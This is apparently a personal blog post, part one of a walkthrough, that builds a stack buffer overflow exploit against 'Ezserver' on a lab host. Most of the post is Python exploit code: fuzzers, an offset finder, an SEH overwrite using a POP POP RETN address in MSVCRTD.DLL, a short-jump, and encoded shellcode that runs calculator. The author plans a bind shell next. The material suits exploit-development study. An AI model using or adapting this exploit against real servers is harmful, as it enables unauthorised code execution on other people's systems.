now i will try to exploit Ezserver
- first, make fuzzer, run the application and then attach process Ezserver into ollydbg
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x41" * 7000
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
the fuzzer try to send 8000 byte character A into Ezserver. we can see the application crash but the EIP not overwrite. and see the SEH chain
then press shift + f9 . so the EIP will be overwrite
- search the stepping stone
menu view --> executables modules.
search module to use as stepping stone that not compiled using safeSEH and Dllcharacteristics.
use msfpescan
first i try to use module js32.dll
then find out the command POP POP RETN, here, i not found the command POP POP RETN, so i try to use module MSVCRTD.DLL
next step, search the POP, POP, RETN
right click --> search for --> sequence of command
then type POP r32, POP r32, RETN. so we found memory address of MSVCRTD.DLL
- search the offset to overwrite the address of SEH
create the pattern for 7000 bytes and then copy into fuzzer.
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa ..............7Iy8Iy9Iz0Iz1Iz2I"
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
see the SEH chain and then press shift + F9
use pattern offset
we can see that we need 5883 byte buffer to trigger the SEH handler
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\xAA\xAA\xAA\xAA"
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
.png)
we can see that the value buffer A success enter into SEH handler
use the address of MSVCRTD.DLL
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
we can see that address of MSVCRTD.DLL have been entered into SEH handler
press shift + f9 to forward process into memory MSVCRTD.DLL
then, press shift + f9 again to continue, and the process will leads into command POP POP RETN
thenpress f7 until reach the command RETN.
.png)
then, make the payload.
but we have a problem, because space of stack in this application aren't enough to landing the payloads.
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL
buffer+="\x90" * 16
payload=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e"
"\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d"
"\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c"
"\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b"
"\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a"
"\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69"
"\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78"
"\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87"
"\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96"
"\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5"
"\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4"
"\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3"
"\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2"
"\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer+="\x90"*16
buffer+=payload
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
we can see in mmory stack, the there are not enough space for landing the payloads
so i try to make that the fuzzer is correct and the payload should be executed. here i try to use payload for execute calculator.
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL
payload=("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")
buffer+="\x90"*16
buffer+=payload
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()
and we got the result like below
so, until here i can conclude that our fuzzer is correct. but we can't to execute bind shell payload, because we need more space on the stack.
i will continue in part 2
No comments:
Post a Comment